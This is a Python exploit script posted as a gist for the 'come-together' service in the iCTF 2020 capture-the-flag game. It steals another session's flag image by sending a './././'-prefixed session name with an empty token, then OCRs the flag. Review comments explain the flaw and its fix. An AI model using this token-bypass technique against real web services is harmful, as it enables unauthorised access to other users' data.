
@conand
Created March 7, 2020 03:06
Exploit for come-together (iCTF 2020)
#! /usr/bin/env python2
import sys
import json
import requests
import traceback
from subprocess import Popen, PIPE
from PIL import Image
import pytesseract
# Crop geometry for the image regions that exploit() hands to the OCR step.
# SIZES[i] is (width, height) and POSITIONS[i] is the matching "+X+Y" offset;
# the two lists are index-aligned and combined into a "WxH+X+Y" argument for
# `convert -crop`. exploit() only iterates over indices 0, 1 and 3.
SIZES = [
    (250, 250),
    (230, 230),
    (60, 60),
    (200, 200),
]
POSITIONS = [
    '+335+360',
    '+780+30',
    '+100+65',
    '+540+25',
]
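def exploit(ip, port, flag_id):
    """Fetch the image served for *flag_id* and OCR the flag out of it.

    Requests ``/love`` on the target with an empty ``token`` and a ``session``
    value made of ``flag_id`` prefixed with ``./././``, saves the PNG that
    comes back, crops three fixed regions with ImageMagick's ``convert`` and
    runs Tesseract on each until one reads as text starting with ``FL``.

    Args:
        ip: Host of the service.
        port: TCP port of the service.
        flag_id: Identifier of the flag to retrieve; used as the session name.

    Returns:
        ``{'error': 0, 'error_msg': '', 'payload': {'flag': flag}}``. ``flag``
        is the empty string when no cropped region OCR'd to text starting
        with ``FL``.

    Raises:
        Exception: if the HTTP status is not 200, or ``convert`` exits
            with a non-zero status.
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    # NOTE(review): the './././' prefix and the empty token are everything this
    # script sends to obtain another session's image. Presumably the service
    # checks the token against the literal session string but loads the image
    # by path, where the prefix is a no-op -- the service code is not shown
    # here, confirm there. Canonicalising the session name before the token
    # lookup would close that gap on the service side, and requests to /love
    # carrying './' in `session` with an empty `token` stand out in access logs.
    session = './././{}'.format(flag_id)
    token = ''
    url = 'http://{}:{}/love?session={}&token={}'.format(ip, port, session, token)

    # Bounded wait: without a timeout an unresponsive host blocks forever.
    r = requests.get(url, timeout=10)
    if r.status_code != 200:
        raise Exception('n00000000b')

    # Fixed file names in the working directory: concurrent runs started from
    # the same directory overwrite each other's images.
    with open('retrieved_ex_1.png', 'wb') as f:
        f.write(r.content)

    flag = ''
    for i in [0, 1, 3]:
        geometry = '{}x{}{}'.format(SIZES[i][0], SIZES[i][1], POSITIONS[i])
        p = Popen(['convert',
                   'retrieved_ex_1.png',
                   '-crop',
                   geometry,
                   'cropped_ex_1.png'])
        p.communicate()
        # A failed crop would otherwise leave a stale cropped_ex_1.png from an
        # earlier iteration or run to be OCR'd as if it were this region.
        if p.returncode != 0:
            raise Exception('convert failed with exit status {}'.format(p.returncode))

        # Close the image handle once Tesseract has read it.
        with Image.open('cropped_ex_1.png') as cropped:
            x = pytesseract.image_to_string(cropped)
        if x.startswith('FL'):
            flag = x.replace('\n', '')
            break

    return {
        'error': 0,
        'error_msg': '',
        'payload': {'flag': flag}
    }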
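def main():
    """Command-line entry point: run exploit() and print one JSON object.

    Expects exactly three arguments (host, port, flag id). On success the dict
    returned by exploit() is printed as JSON. On any exception, including a
    wrong argument count, a JSON object with ``error`` set to 1 and the
    exception text plus traceback in ``error_msg`` is printed instead; with a
    wrong argument count the usage line is printed before it.
    """
    try:
        if len(sys.argv) != 4:
            print('Use: python2 exploit_1.py <HOST> <PORT> <FLAG_ID>')
            raise Exception('Missing parameters')
        # Parenthesised single-argument print behaves the same under the
        # python2 interpreter named in the shebang and also parses on Python 3.
        print(json.dumps(exploit(sys.argv[1], sys.argv[2], sys.argv[3])))
    except Exception as e:
        response = {
            "error": 1,
            "error_msg": str(e) + traceback.format_exc(),
            "payload": {}
        }
        print(json.dumps(response))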
# Run the command-line entry point only when executed as a script.
if __name__ == '__main__':
    main()